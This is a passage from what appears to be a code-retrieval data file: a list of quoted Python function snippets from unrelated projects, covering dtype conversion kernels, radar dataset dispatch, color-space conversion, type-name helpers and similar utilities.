'f162f32', 'f322s32z'):\n self.emit(\n tvm.call_extern(dst.dtype, \"reg_set\", dst.get(),\n dtype_convert(src, dst.dtype)), ONE_IR)\n else:\n self.emit(\n tvm.call_extern(\n dst.dtype, \"reg_set\", dst.get(),\n tvm.call_extern(src.dtype, 'conv_' + dtype_str,\n src.get())), ONE_IR)", "def get_conv_type(filename):\n for conv_type in structured.conv2d_types.keys():\n if conv_type in filename:\n return conv_type\n else:\n log.error(\"Couldn't detect convolution type of\", filename)\n exit(1)", "def swcf(fsntoa, fsntoac):\n var = fsntoa - fsntoac\n var.long_name = \"TOA shortwave cloud forcing\"\n return var", "def src_get_description(converter_type):\n return ffi.string(_lib.src_get_description(converter_type)).decode()", "def get_process_func(dataset_type, dsname):\n\n dsformat = 'VOL'\n if dataset_type == 'RAW':\n func_name = process_raw\n elif dataset_type == 'NCVOL':\n func_name = process_save_radar\n elif dataset_type == 'PWR':\n func_name = 'process_signal_power'\n elif dataset_type == 'SNR':\n func_name = 'process_snr'\n elif dataset_type == 'RHOHV_CORRECTION':\n func_name = 'process_correct_noise_rhohv'\n elif dataset_type == 'BIAS_CORRECTION':\n func_name = 'process_correct_bias'\n elif dataset_type == 'L':\n func_name = 'process_l'\n elif dataset_type == 'CDR':\n func_name = 'process_cdr'\n elif dataset_type == 'SAN':\n func_name = 'process_echo_id'\n elif dataset_type == 'ECHO_FILTER':\n func_name = 'process_echo_filter'\n elif dataset_type == 'SNR_FILTER':\n func_name = 'process_filter_snr'\n elif dataset_type == 'VIS_FILTER':\n func_name = 'process_filter_visibility'\n elif dataset_type == 'OUTLIER_FILTER':\n func_name = 'process_outlier_filter'\n elif dataset_type == 'PHIDP0_CORRECTION':\n func_name = 'process_correct_phidp0'\n elif dataset_type == 'PHIDP_SMOOTH_1W':\n func_name = 'process_smooth_phidp_single_window'\n elif dataset_type == 'PHIDP_SMOOTH_2W':\n func_name = 'process_smooth_phidp_double_window'\n elif dataset_type == 'PHIDP_KDP_MAESAKA':\n func_name = 'process_phidp_kdp_Maesaka'\n elif dataset_type == 'PHIDP_KDP_LP':\n func_name = 'process_phidp_kdp_lp'\n elif dataset_type == 'KDP_LEASTSQUARE_1W':\n func_name = 'process_kdp_leastsquare_single_window'\n elif dataset_type == 'KDP_LEASTSQUARE_2W':\n func_name = 'process_kdp_leastsquare_double_window'\n elif dataset_type == 'ATTENUATION':\n func_name = 'process_attenuation'\n elif dataset_type == 'RAINRATE':\n func_name = 'process_rainrate'\n elif dataset_type == 'WIND_VEL':\n func_name = 'process_wind_vel'\n elif dataset_type == 'WINDSHEAR':\n func_name = 'process_windshear'\n elif dataset_type == 'HYDROCLASS':\n func_name = 'process_hydroclass'\n elif dataset_type == 'PHIDP0_ESTIMATE':\n func_name = 'process_estimate_phidp0'\n elif dataset_type == 'RHOHV_RAIN':\n func_name = 'process_rhohv_rain'\n elif dataset_type == 'ZDR_RAIN':\n func_name = 'process_zdr_rain'\n elif dataset_type == 'SELFCONSISTENCY_KDP_PHIDP':\n func_name = 'process_selfconsistency_kdp_phidp'\n elif dataset_type == 'SELFCONSISTENCY_BIAS':\n func_name = 'process_selfconsistency_bias'\n elif dataset_type == 'TIME_AVG':\n func_name = 'process_time_avg'\n dsformat = 'TIMEAVG'\n elif dataset_type == 'WEIGHTED_TIME_AVG':\n func_name = 'process_weighted_time_avg'\n dsformat = 'TIMEAVG'\n elif dataset_type == 'FLAG_TIME_AVG':\n func_name = 'process_time_avg_flag'\n dsformat = 'TIMEAVG'\n elif dataset_type == 'COLOCATED_GATES':\n func_name = 'process_colocated_gates'\n dsformat = 'COLOCATED_GATES'\n elif dataset_type == 'INTERCOMP':\n func_name = 'process_intercomp'\n dsformat = 'INTERCOMP'\n elif dataset_type == 'INTERCOMP_TIME_AVG':\n func_name = 'process_intercomp_time_avg'\n dsformat = 'INTERCOMP'\n elif dataset_type == 'MONITORING':\n func_name = 'process_monitoring'\n dsformat = 'MONITORING'\n elif dataset_type == 'SUN_HITS':\n func_name = 'process_sun_hits'\n dsformat = 'SUN_HITS'\n elif dataset_type == 'POINT_MEASUREMENT':\n func_name = process_point_measurement\n dsformat = 'TIMESERIES'\n elif dataset_type == 'TRAJ':\n func_name = process_trajectory\n dsformat = 'TRAJ_ONLY'\n elif dataset_type == 'TRAJ_ATPLANE':\n func_name = process_traj_atplane\n dsformat = 'TIMESERIES'\n elif dataset_type == 'TRAJ_ANTENNA_PATTERN':\n func_name = process_traj_antenna_pattern\n dsformat = 'TIMESERIES'\n else:\n raise ValueError(\"ERROR: Unknown dataset type '%s' of dataset '%s'\"\n % (dataset_type, dsname))\n\n return func_name, dsformat", "def f2c_cml_function():\n import sys\n\n F = float(sys.argv[1])\n C = 5/9.0*F - 32\n print(\"The temperatire in Celcius is {:g}\".format(C))", "def _get_op_str(self):\n import CCAugmentation.outputs as cca_out\n import CCAugmentation.transformations as cca_trans\n\n if type(self.operation) is str:\n op_name_str = self.operation\n else:\n op_name_str = self.operation.__name__\n\n try:\n getattr(cca_trans, op_name_str)\n op_str = f\"cca_trans.{op_name_str}\"\n except AttributeError:\n try:\n getattr(cca_out, op_name_str)\n op_str = f\"cca_out.{op_name_str}\"\n except AttributeError:\n op_str = op_name_str\n\n return op_str", "def cast(*args):\n return _ITKCostFunctionsPython.itkSingleValuedCostFunction_cast(*args)", "def c_cd2cp(s, N):\n color, move = s.strip().split()\n # print('color:{} move:{}'.format(color,move))\n c = color2c(color)\n p = cd2p(move, N)\n return c, p", "def cachename_from_args(undirected, supervised, with_authors, collate_coauthorship):\n name = ''\n if undirected:\n name += 'undirected'\n else:\n name += 'directed'\n name += '-'\n if supervised:\n name += 'supervised'\n else:\n name += 'unsupervised'\n name += '-'\n if with_authors:\n if collate_coauthorship:\n name += 'collated-authors'\n else:\n name += 'first-class-authors'\n else:\n name += 'no-authors'\n return name", "def wrapper_function_name(text):\n text = GLGenerator.split_to_body_and_ext(text)\n body = text[0]\n ext = text[1]\n for suffix, replacement in FUNCTION_SUFFIXES.items():\n if body.endswith(suffix):\n body = body[:-len(suffix)] + replacement\n break\n text = body + ext\n res = util.to_snake_case(text[2:])\n return res", "def function_name(parameters):", "def convert(self, slot):\n return mbv2_predefined_convert_fn(slot)", "def get_loss_fn(kind):\n if kind == 'classic':\n loss_fn = classic_gan_losses\n elif kind == 'nonsaturating':\n loss_fn = nonsaturating_gan_losses\n elif kind == 'wasserstein':\n loss_fn = wasserstein_gan_losses\n elif kind == 'hinge':\n loss_fn = hinge_gan_losses\n return loss_fn", "def convert_color(color, target_cs, through_rgb_type=sRGBColor,\r\n target_illuminant=None, *args, **kwargs):\r\n\r\n if isinstance(target_cs, str):\r\n raise ValueError(\"target_cs parameter must be a Color object.\")\r\n if not issubclass(target_cs, ColorBase):\r\n raise ValueError(\"target_cs parameter must be a Color object.\")\r\n\r\n # Find the origin color space's conversion table.\r\n cs_table = CONVERSION_TABLE[color.__class__.__name__]\r\n try:\r\n # Look up the conversion path for the specified color space.\r\n conversions = cs_table[target_cs.__name__]\r\n except KeyError:\r\n raise UndefinedConversionError(\r\n color.__class__.__name__,\r\n target_cs.__name__,\r\n )\r\n\r\n logger.debug('Converting %s to %s', color, target_cs)\r\n logger.debug(' @ Conversion path: %s', conversions)\r\n\r\n # Start with original color in case we convert to the same color space.\r\n new_color = color\r\n\r\n if issubclass(target_cs, BaseRGBColor):\r\n # If the target_cs is an RGB color space of some sort, then we\r\n # have to set our through_rgb_type to make sure the conversion returns\r\n # the expected RGB colorspace (instead of defaulting to sRGBColor).\r\n through_rgb_type = target_cs\r\n\r\n # We have to be careful to use the same RGB color space that created\r\n # an object (if it was created by a conversion) in order to get correct\r\n # results. For example, XYZ->HSL via Adobe RGB should default to Adobe\r\n # RGB when taking that generated HSL object back to XYZ.\r\n # noinspection PyProtectedMember\r\n if through_rgb_type != sRGBColor:\r\n # User overrides take priority over everything.\r\n # noinspection PyProtectedMember\r\n target_rgb = through_rgb_type\r\n elif color._through_rgb_type:\r\n # Otherwise, a value on the color object is the next best thing,\r\n # when available.\r\n # noinspection PyProtectedMember\r\n target_rgb = color._through_rgb_type\r\n else:\r\n # We could collapse this into a single if statement above,\r\n # but I think this reads better.\r\n target_rgb = through_rgb_type\r\n\r\n # Iterate through the list of functions for the conversion path, storing\r\n # the results in a dictionary via update(). This way the user has access\r\n # to all of the variables involved in the conversion.\r\n for func in conversions:\r\n # Execute the function in this conversion step and store the resulting\r\n # Color object.\r\n logger.debug(' * Conversion: %s passed to %s()',\r\n new_color.__class__.__name__, func)\r\n logger.debug(' |-> in %s', new_color)\r\n\r\n if func:\r\n # This can be None if you try to convert a color to the color\r\n # space that is already in. IE: XYZ->XYZ.\r\n new_color = func(\r\n new_color,\r\n target_rgb=target_rgb,\r\n target_illuminant=target_illuminant,\r\n *args, **kwargs)\r\n\r\n logger.debug(' |-< out %s', new_color)\r\n\r\n # If this conversion had something other than the default sRGB color space\r\n # requested,\r\n if through_rgb_type != sRGBColor:\r\n new_color._through_rgb_type = through_rgb_type\r\n\r\n return new_color", "def get_func_type(self, *args):\n return _ida_hexrays.cfuncptr_t_get_func_type(self, *args)", "def type_to_sc_type(type_, prefix='sc'):\n return '{}{}'.format(prefix.upper(), type_.title())", "def get_type_functional_name(type):\n name = type.name\n if type.is_simple:\n return name\n elif type.is_enum:\n return 'str'\n elif type.is_complex:\n return get_class_name(name)", "def _name_from_args(func, _, params):\n return \"{}_{}\".format(func.__name__, \"_\".join(str(arg) for arg in params.args))", "def typeToName(type: int) -> unicode:\n ...", "def cast_to(ibuilder, data_amounts, src_buf, dst_buf):\n src_dtype = src_buf.dtype\n dst_dtype = dst_buf.dtype\n if src_dtype == \"float16\" and dst_dtype == \"int32\":\n vconv_instr = \"vconv_f162s32f\"\n vconv_compute_num = VEC_NUMS_HALF\n elif src_dtype == \"float32\" and dst_dtype == \"float16\":\n vconv_instr = \"vconv_f322f16\"\n vconv_compute_num = VEC_NUMS_HALF\n elif src_dtype == \"float32\" and dst_dtype == \"int32\":\n vconv_instr = \"vconv_f322s32f\"\n vconv_compute_num = VEC_NUMS_HALF\n # vconv_s322f32 only support cloud_v100\n elif src_dtype == \"int32\" and dst_dtype == \"float32\":\n vconv_instr = \"vconv_s322f32\"\n vconv_compute_num = VEC_NUMS_HALF\n elif src_dtype == \"int8\" and dst_dtype == \"float16\":\n vconv_instr = \"vconv_s82f16\"\n vconv_compute_num = VEC_NUMS\n elif src_dtype == \"uint8\" and dst_dtype == \"float16\":\n vconv_instr = \"vconv_u82f16\"\n vconv_compute_num = VEC_NUMS\n elif src_dtype == \"float16\" and dst_dtype == \"float32\":\n vconv_instr = \"vconv_f162f32\"\n vconv_compute_num = VEC_NUMS_HALF\n elif src_dtype == \"float16\" and dst_dtype == \"int8\":\n vconv_instr = \"vconv_f162s8f\"\n vconv_compute_num = VEC_NUMS\n elif src_dtype == \"float16\" and dst_dtype == \"uint8\":\n vconv_instr = \"vconv_f162u8f\"\n vconv_compute_num = VEC_NUMS\n\n def compute_stride(src_type, dst_type, vconv_num):\n \"\"\"\n Calculated stride value\n \"\"\"\n perblock_nums_a = compute_perblock_nums(src_type)\n perblock_nums_b = compute_perblock_nums(dst_type)\n src_stride = vconv_num // perblock_nums_a\n dst_stride = vconv_num // perblock_nums_b\n\n return src_stride, dst_stride\n\n src_strides, dst_strides = compute_stride(src_dtype, dst_dtype, vconv_compute_num)\n\n # recheck vconv_instr support\n if not tbe_platform.cce_conf.intrinsic_check_support(\"Intrinsic_vconv\", \\\n vconv_instr.split('_')[1]):\n raise RuntimeError(\"This product don't support Intrinsic_vconv \" + \\\n vconv_instr)\n\n repeats = int(data_amounts // vconv_compute_num)\n remain = int(data_amounts % vconv_compute_num)\n init_times = int(repeats // UINT8_MAX)\n init_remain = int(repeats % UINT8_MAX)\n with ibuilder.if_scope(repeats != 0):\n if init_times != 0:\n with ibuilder.for_range(0, init_times) as rch:\n with ibuilder.new_scope():\n reset_mask_insn(\n ibuilder, dst_buf.dtype, bits=vconv_compute_num)\n ibuilder.emit(tvm.call_extern(dst_buf.dtype, vconv_instr, \\\n dst_buf.access_ptr('w', offset=rch * UINT8_MAX\n * vconv_compute_num), \\\n src_buf.access_ptr('r', offset=rch * UINT8_MAX\n * vconv_compute_num), \\\n 255, 1, 1, dst_strides, src_strides))\n if init_remain != 0:\n with ibuilder.new_scope():\n reset_mask_insn(ibuilder, dst_buf.dtype, bits=vconv_compute_num)\n ibuilder.emit(tvm.call_extern(dst_buf.dtype, vconv_instr, \\\n dst_buf.access_ptr('w', offset=init_times * UINT8_MAX\n * vconv_compute_num), \\\n src_buf.access_ptr('r', offset=init_times * UINT8_MAX\n * vconv_compute_num), \\\n init_remain, 1, 1, dst_strides, src_strides))\n\n with ibuilder.if_scope(remain != 0):\n with ibuilder.new_scope():\n mask_len = remain\n reset_mask_insn(ibuilder, dst_buf.dtype, bits=mask_len)\n ibuilder.emit(tvm.call_extern(dst_buf.dtype, vconv_instr, \\\n dst_buf.access_ptr('w', offset=repeats\n * vconv_compute_num), \\\n src_buf.access_ptr('r', offset=repeats\n * vconv_compute_num), \\\n 1, 1, 1, 0, 0))", "def _name_to_func(self, cmd_name: str):\n if cmd_name not in SUPPORTED_COMMANDS:\n # redis remaps \\r or \\n in an error to ' ' to make it legal protocol\n clean_name = cmd_name.replace(\"\\r\", \" \").replace(\"\\n\", \" \")\n raise SimpleError(msgs.UNKNOWN_COMMAND_MSG.format(clean_name))\n sig = SUPPORTED_COMMANDS[cmd_name]\n func = getattr(self, sig.func_name, None)\n return func, sig", "def converter(c, f):\n u,v,w,x,y = [connector() for _ in range(5)]\n multiplier(c, w, u)\n multiplier(u, x, v)\n adder(v, y, f)\n constant(w, 9)\n constant(x, 5)\n constant(y, 32)", "def getFunctionStyle(self,cpArray,X0):\n cpArray=tf.cast(tf.convert_to_tensor(cpArray),dtype=tf.float64)\n X0 = tf.cast(tf.convert_to_tensor(X0),dtype=tf.float64)\n func = self.lamda_computeCPdiff(X0)\n gatheredCps = tf.map_fn(func,cpArray,parallel_iterations=32,back_prop=False)\n return gatheredCps", "def converter(c, f):\n u, v, w, x, y = [connector() for _ in range(5)]\n multiplier(c, w, u)\n multiplier(v, x, u)\n adder(v, y, f)\n constant(x, 5)\n constant(w, 9)\n constant(y, 32)", "def input_name_from_func_name(func_name):\n\treturn os.path.join(INPUTS_DIR, ''.join(func_name.split('make_')[1:])) \\\n\t\t\t+ '.%s' % EXTENSION", "def _cc(self, args):\n if isinstance(args, str):\n return args\n try:\n r, g, b = args\n except (TypeError, ValueError):\n raise TurtleGraphicsError(\"bad color arguments: %s\" % str(args))\n if self.screen._colormode == 1.0:\n r, g, b = [round(255.0*x) for x in (r, g, b)]\n if not ((0 <= r <= 255) and (0 <= g <= 255) and (0 <= b <= 255)):\n raise TurtleGraphicsError(\"bad color sequence: %s\" % str(args))\n return \"#%02x%02x%02x\" % (r, g, b)", "def make_convertor(name, dtype):\n\n # The spaces may be important in the strings, but don't think\n # they are for my use case, so remove them.\n #\n if dtype == 'char':\n if name.endswith('_flag'):\n return convert_to_bool\n else:\n return lambda v: v.strip()\n elif dtype == 'int':\n return convert_to_int\n elif dtype == 'double':\n return convert_to_float\n elif dtype == 'boolean':\n return convert_to_bool\n else:\n raise ValueError(dtype)", "def _fc_function_definitions(self) -> str:\n result = 'extern \"C\" {\\n\\n'\n for namespace in self.namespaces:\n for member in namespace.members:\n result += member.fortran_c_wrapper()\n\n result += '}\\n\\n'\n return result", "def format_functor(name, arity=None):\n if arity is not None:\n return '%s/%d' % (name, arity)\n elif type(name) is str:\n return name\n else:\n return '%s/%d' % name", "def conversion_to_string(cv_code):\n strs = {cv2.COLOR_BGR2GRAY:\"bgr to gray\",\n cv2.COLOR_BGR2HSV:\"bgr to hsv\",\n cv2.COLOR_BGR2Luv:\"bgr to Luv\",\n cv2.COLOR_BGR2XYZ:\"bgr to xyz\",\n cv2.COLOR_BGR2YCrCb:\"bgr to YCrCb\",\n cv2.COLOR_BGR2HLS:\"bgr to hls\",\n cv2.COLOR_BGR2Lab: \"bgr to Lab\"}\n return strs[cv_code]", "def primitive(self, arg: SeField[Any]) -> str:\n typ = typename(arg.type)\n var = arg.varname\n if self.suppress_coerce:\n return var\n else:\n return f\"coerce({typ}, {var})\"", "def _deviceVariableFunctionName(self, tree, permitted_prefixes, allow_lengths = True):\n cpp_func_name = \"\"\n py_func = tree.attr\n # extract function name start\n for prefix in permitted_prefixes:\n if py_func.startswith(prefix):\n cpp_func_name = prefix\n py_func = py_func[len(prefix):]\n break # dont allow the else\n else:\n return None\n # check type and lengths\n if allow_lengths:\n #split to get type and Array Length (This could **potentially** be looked up from the model description but current syntax is consistent with swig bindings) \n type_and_length = py_func.split(\"Array\")\n if type_and_length[0] not in self._fgpu_types:\n self.RaiseError(tree, f\"'{type_and_length[0]}' is not a valid FLAME GPU type\")\n t = self._fgpu_types[type_and_length[0]]\n # generate template args\n if (len(type_and_length) == 1):\n cpp_func_name += f\"<{t}>\"\n elif (len(type_and_length) == 2):\n cpp_func_name += f\"<{t}, {type_and_length[1]}>\"\n else:\n return None\n else:\n if py_func not in self._fgpu_types:\n self.RaiseError(tree, f\"'{py_func}' is not a valid FLAME GPU type\")\n t = self._fgpu_types[py_func]\n cpp_func_name += f\"<{t}>\"\n # return \n return cpp_func_name", "def core_name(self):\n buf_size = self.MAX_BUF_SIZE\n buf = (ctypes.c_char * buf_size)()\n self._dll.JLINKARM_Core2CoreName(self.core_cpu(), buf, buf_size)\n return ctypes.string_at(buf).decode()", "def _colorstr(self, args):", "def config_identifier(converter, model_name):\n return model_name.lower().replace('-', '_') + '_' + converter", "def conversion(arg1, arg2=None, name=None, cost=None):\n if arg2 is None:\n return conversion_method(arg1, name=name, cost=cost)\n else:\n return computation(arg1, arg2, name=name, cost=cost)", "def get_func_name(func, resolv_alias=True, win_characters=True):\r\n if hasattr(func, '__module__'):\r\n module = func.__module__\r\n else:\r\n try:\r\n module = inspect.getmodule(func)\r\n except TypeError:\r\n if hasattr(func, '__class__'):\r\n module = func.__class__.__module__\r\n else:\r\n module = 'unknown'\r\n if module is None:\r\n # Happens in doctests, eg\r\n module = ''\r\n if module == '__main__':\r\n try:\r\n filename = os.path.abspath(inspect.getsourcefile(func))\r\n except:\r\n filename = None\r\n if filename is not None:\r\n # mangling of full path to filename\r\n parts = filename.split(os.sep)\r\n if parts[-1].startswith('<ipython-input'):\r\n # function is defined in an IPython session. The filename\r\n # will change with every new kernel instance. This hack\r\n # always returns the same filename\r\n parts[-1] = '__ipython-input__'\r\n filename = '-'.join(parts)\r\n if filename.endswith('.py'):\r\n filename = filename[:-3]\r\n module = module + '-' + filename\r\n module = module.split('.')\r\n if hasattr(func, 'func_name'):\r\n name = func.func_name\r\n elif hasattr(func, '__name__'):\r\n name = func.__name__\r\n else:\r\n name = 'unknown'\r\n # Hack to detect functions not defined at the module-level\r\n if resolv_alias:\r\n # TODO: Maybe add a warning here?\r\n if hasattr(func, 'func_globals') and name in func.func_globals:\r\n if not func.func_globals[name] is func:\r\n name = '%s-alias' % name\r\n if inspect.ismethod(func):\r\n # We need to add the name of the class\r\n if hasattr(func, 'im_class'):\r\n klass = func.im_class\r\n module.append(klass.__name__)\r\n if os.name == 'nt' and win_characters:\r\n # Stupid windows can't encode certain characters in filenames\r\n name = _clean_win_chars(name)\r\n module = [_clean_win_chars(s) for s in module]\r\n return module, name", "def _conversion_factor_internal(unit: str):\n return globals()[unit]", "def _generate_function_specific_name(a, vertices):\n coeff_hash = hash(str(a))\n if coeff_hash < 0:\n # Cannot have minus sign in name\n coeff_hash *= -1\n vertices_hash = hash(str(vertices))\n if vertices_hash < 0:\n # Cannot have minus sign in name\n vertices_hash *= -1\n return str(coeff_hash) + \"_\" + str(vertices_hash)", "def get_cnn_fn(model, num_classes):\n model = model.lower()\n assert model == \"cnn\"\n\n if num_classes != 10:\n raise ValueError(\n f\"Model {model} supports only 10 classes, {num_classes} given.\")\n def cnn_model_fn(*args, **kwargs):\n return cnn.CifarNet(*args, **kwargs)\n return cnn_model_fn", "def cftype_to_value(cftype):\n if not cftype:\n return None\n typeID = cf.CFGetTypeID(cftype)\n if typeID in known_cftypes:\n convert_function = known_cftypes[typeID]\n return convert_function(cftype)\n else:\n return cftype", "def mode_to_text(cls, mode: int) -> str:\n if mode == cls.ModeCV:\n return 'CV'\n elif mode == cls.ModeCC:\n return 'CC'\n else:\n return 'EE'", "def convert_type(self, name, type):\n\t\t#\t\tprint 'Called with name = %s and type = %s' %(name, type)\n\t\tname = ''.join(name.split())\n\t\ttype = ''.join(type.split())\n\n\t\tif re.match(r'\\w+', type): #It's a concrete type\n\t\t\treturn self.TYPES_DICT.get(type,type) + ' ' + name\n\n\t\tarrow = type.rfind('->')\n\t\tassert arrow != -1, \"If it's not a primitive, it must be a function\"\n\t\tparams, return_type = type[:arrow], type[arrow+2:]\n\t\tassert params[0] == '(' and params[-1] == ')'\n\t\tparams = params[1:-1]\n\n\t\tparams_tokenized = Lexer(params).get_tokens()\n\t\tparam_list = self.split_params(params_tokenized)\n\t\tcpp_params = map(lambda n: self.convert_type('', n), param_list)\n\t\treturn_type = self.convert_type('', return_type)\n\t\treturn return_type + '(*' + name + ')(' + ','.join(cpp_params) + ')'", "def name(self):\n name = self.function_name\n\n # Feature type is based on additional data that used\n # for example if insight is for Healthsites Facilities\n # than feature type is Healthsites Facilities\n\n if self.feature_type:\n name = '%s for %s' % (name, self.feature_type)\n return name", "def get_encoder_fn_separate(model_type, \n # e.g., model_type = 'resnet_fc3_dropout'\n encoder_fn_type = \"Encoder_resnet_v2\"\n ):\n encoder_fn = None\n threed_fn = None\n if 'resnet' in model_type:\n #encoder_fn = Encoder_resnet\n # added by CCJ\n encoder_fn = Encoder_resnet_v2\n if encoder_fn_type is \"Encoder_resnet\":\n encoder_fn = Encoder_resnet\n\n else:\n print('Unknown encoder %s!' % model_type)\n exit(1)\n\n if 'fc3_dropout' in model_type:\n threed_fn = Encoder_fc3_dropout\n\n if encoder_fn is None or threed_fn is None:\n print('Dont know what encoder to use for %s' % model_type)\n import ipdb\n ipdb.set_trace()\n\n return encoder_fn, threed_fn", "def convert_to_premis_hash_function(hash_type):\n if hash_type.lower().startswith(\"sha\") and \"-\" not in hash_type:\n hash_type = \"SHA-\" + hash_type.upper()[3:]\n elif hash_type.lower() == \"md5\":\n return \"MD5\"\n\n return hash_type", "def getFunctionClass(functionID):\n d = { 1: Linear,\n 2: LinearDrag,\n 11: Gaussian,\n 12: GaussianDrag,\n 21: Lorentzian,\n 22: LorentzianDrag }\n return d[functionID]", "def _get_name(self):\n return '%s: %s-%s' % (\n self.fcs_number,\n self.parameter_type,\n self.parameter_value_type)", "def get_converter(from_case: Optional[LetterCaseType], to_case: LetterCaseType) -> Optional[ConverterType]:\n to_case = get_letter_case(to_case)\n\n name = f\"to_{to_case.name.lower()}_case\"\n\n if from_case is not None:\n from_case = get_letter_case(from_case)\n name = f\"{from_case.name.lower()}_{name}\"\n\n return globals().get(name)", "def name(inp, mode, **kwargs):\n return name.dispatch(inp, mode, **kwargs)", "def gen_funcs_with_const(self):\n func_with_const = '\\n (func (export \"{lane_type}.{op}_with_const_{cnt}\") (result v128) ({lane_type}.{op} {param_1} {param_2}))'\n func_with_param_and_const = '\\n (func (export \"{lane_type}.{op}_with_const_{cnt}\") (param v128) (result v128) ({lane_type}.{op} (local.get 0) {param_1}))'\n funcs = ''\n cnt = 0\n for op in self.BINARY_OPS:\n for param_1, param_2 in self.get_test_data_with_const:\n funcs += func_with_const.format(lane_type=self.LANE_TYPE,\n op=op,\n param_1=SIMD.v128_const(param_1, self.LANE_TYPE),\n param_2=SIMD.v128_const(param_2, self.LANE_TYPE),\n cnt=cnt)\n cnt += 1\n\n for op in self.BINARY_OPS:\n for param_1, param_2 in self.get_test_data_with_const:\n funcs += func_with_param_and_const.format(lane_type=self.LANE_TYPE,\n op=op,\n param_1=SIMD.v128_const(param_1, self.LANE_TYPE),\n cnt=cnt)\n cnt += 1\n\n return funcs", "def fn(name : str, *, input : 'NET', gnd : 'NET', output : 'NET'):\n return make_component(name, type, {\"in\": input, \"gnd\":gnd, \"out\":output}, [], {'voltage': voltage}, prefix=\"U\")", "def _detect_name(self):\n\n if 'Model name' in self.cpu_info:\n return self.cpu_info['Model name']\n\n # CPUs C/S Nodes Sockets\n # D03 16 4 1 4 (likely to change in the future)\n # D05 64 32 4 2\n # Amber 46-92 46 1 1-2\n # Tx2 28~224 28 2 1-2\n elif int(self.cpu_info['CPU(s)']) == 16 and \\\n int(self.cpu_info['Socket(s)']) == 4:\n return \"D03\"\n\n elif int(self.cpu_info['CPU(s)']) == 64 and \\\n int(self.cpu_info['Socket(s)']) == 2 and \\\n int(self.cpu_info['NUMA node(s)']) == 4:\n return \"D05\"\n\n elif int(self.cpu_info['Core(s) per socket']) == 46 and \\\n int(self.cpu_info['NUMA node(s)']) == 1:\n return \"Amberwing\"\n\n elif int(self.cpu_info['Core(s) per socket']) == 28 and \\\n int(self.cpu_info['NUMA node(s)']) == 2:\n return \"ThunderX2\"", "def _get_conversion_disk_Type(self, _src_disk_extn, _dest_disk_extn):\r\n\r\n disk_conversion = {\r\n \"vhdx\": {\r\n \"vhd\": (\"VIRTUAL_HARD_DISKS\", \"VHD_DYNAMIC\"),\r\n \"vmdk\": (\"VMDK_FILES\", \"VMDK_VCB4\")\r\n },\r\n \"vmdk\": {\r\n \"vhd\": (\"VIRTUAL_HARD_DISKS\", \"VHD_DYNAMIC\"),\r\n \"vhdx\": (\"VIRTUAL_HARD_DISKS\", \"VHDX_DYNAMIC\")\r\n }\r\n }\r\n _src_disk_extn = _src_disk_extn.lower().strip(\".\")\r\n _dest_disk_extn = _dest_disk_extn.lower().strip(\".\")\r\n\r\n return disk_conversion[_src_disk_extn][_dest_disk_extn]", "def GetSurfaceConversion(self, *args):\n return _ShapeUpgrade.ShapeUpgrade_ShapeConvertToBezier_GetSurfaceConversion(self, *args)", "def _cmplx_factory_ ( cmplxt , re , im ) :\n return cmplxt ( re , im )", "def pad_arguments_np2cv(padding_mode):\r\n\r\n #Check that the padding_mode is actually supported by OpenCV\r\n supported = [\"constant\",\"edge\",\"reflect\",\"symmetric\",\"wrap\"]\r\n assert padding_mode in supported, \"The padding mode: '\"+padding_mode+\"' is\\\r\n not supported\"\r\n \r\n if padding_mode==\"constant\":\r\n return \"cv2.BORDER_CONSTANT\"\r\n if padding_mode==\"edge\":\r\n return \"cv2.BORDER_REPLICATE\"\r\n if padding_mode==\"reflect\":\r\n return \"cv2.BORDER_REFLECT_101\"\r\n if padding_mode==\"symmetric\":\r\n return \"cv2.BORDER_REFLECT\"\r\n if padding_mode==\"wrap\":\r\n return \"cv2.BORDER_WRAP\"", "def fmtd_str(self,c=False,prefix_symbol=\"\"):\n psym = prefix_symbol\n ms1 = (\n f\"{self.filename_prefix_mono}{self.event_kind:9} \"\n f\"{self.separator * len(self.stack)} \"\n )\n lms1 = len(ms1)+len(\"(\")\n join_mstr = f\",\\n{' '*lms1}\"\n mavs = (\n f\"{self.argvars}\"\n )\n ms = f\"{psym}{ms1}{mavs}\"\n if c:\n aac = argvars_argname_color = \"MAGENTA\"\n ps1 = (\n f\"{self.filename_prefix_poly}{self.color.fore(f'{self.event_kind:9}','KIND')} \"\n f\"{self.separator * len(self.stack)} \"\n )\n lps1 = lms1\n join_pstr = f\",\\n{' '*lps1}\"\n pavs = (\n f\"{self.argvars}\"\n )\n ps = f\"{psym}{ps1}{pavs}\"\n return ps\n return ms", "def string_conversion_method(self) -> tp.Callable:\n\n # First, look for a method defined for this specific type.\n try:\n field_type_name = self.field_type.__name__\n except AttributeError:\n raise AttributeError(f\"Could not detect name of field type {self.field_type}.\")\n try:\n return getattr(self, f\"_string_to_{field_type_name}\")\n except AttributeError:\n pass\n\n # Try a super-type method.\n if issubclass(self.field_type, str):\n return lambda value: value\n if issubclass(self.field_type, GameObjectSequence):\n return self._string_to_GameObjectSequence\n if issubclass(self.field_type, GameObject):\n return self._string_to_GameObject\n if issubclass(self.field_type, IntEnum):\n raise NotImplementedError\n\n raise AttributeError(f\"Could not find field update method '_string_to_{field_type_name}' or a superclass.\")", "def __resolveCommandType(self, command, e):\n # check for existing DCC Connection\n try:\n if self.__IpToUser[e.source()]['auth'] == NOT_AUTHED:\n return 'not_authed_dcc'\n else:\n return 'authed_dcc'\n # DCC Connection does not exist\n except KeyError:\n\n if not is_channel(e.target()):\n return 'query'\n else:\n # defaults to channel\n return 'channel'", "def gwcalctyp(self):\n dig0 = str(self._SIGMA_TYPES[self.type])\n dig1 = str(self._SC_MODES[self.sc_mode])\n return dig1.strip() + dig0.strip()", "def get_class_functional_name(name):\n name = _strip_class_name(name)\n return name", "def convertColorSpace(\n self,\n img, # Image in some color space\n srcColorSpace = 'BGR', # Source color space\n tgtColorSpace = 'RGB', # Traget color space\n ):\n\n if srcColorSpace == tgtColorSpace:\n return img\n\n if srcColorSpace == 'BGR':\n img_bgr = img\n elif srcColorSpace == 'RGB':\n img_bgr = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n elif srcColorSpace == 'HSV':\n img_bgr = cv2.cvtColor(img, cv2.COLOR_HSV2BGR)\n elif srcColorSpace == 'HLS':\n img_bgr = cv2.cvtColor(img, cv2.COLOR_HLS2BGR)\n elif srcColorSpace == 'LUV':\n img_bgr = cv2.cvtColor(img, cv2.COLOR_LUV2BGR)\n elif srcColorSpace == 'YUV':\n img_bgr = cv2.cvtColor(img, cv2.COLOR_YUV2BGR)\n elif srcColorSpace == 'YCrCb':\n img_bgr = cv2.cvtColor(img, 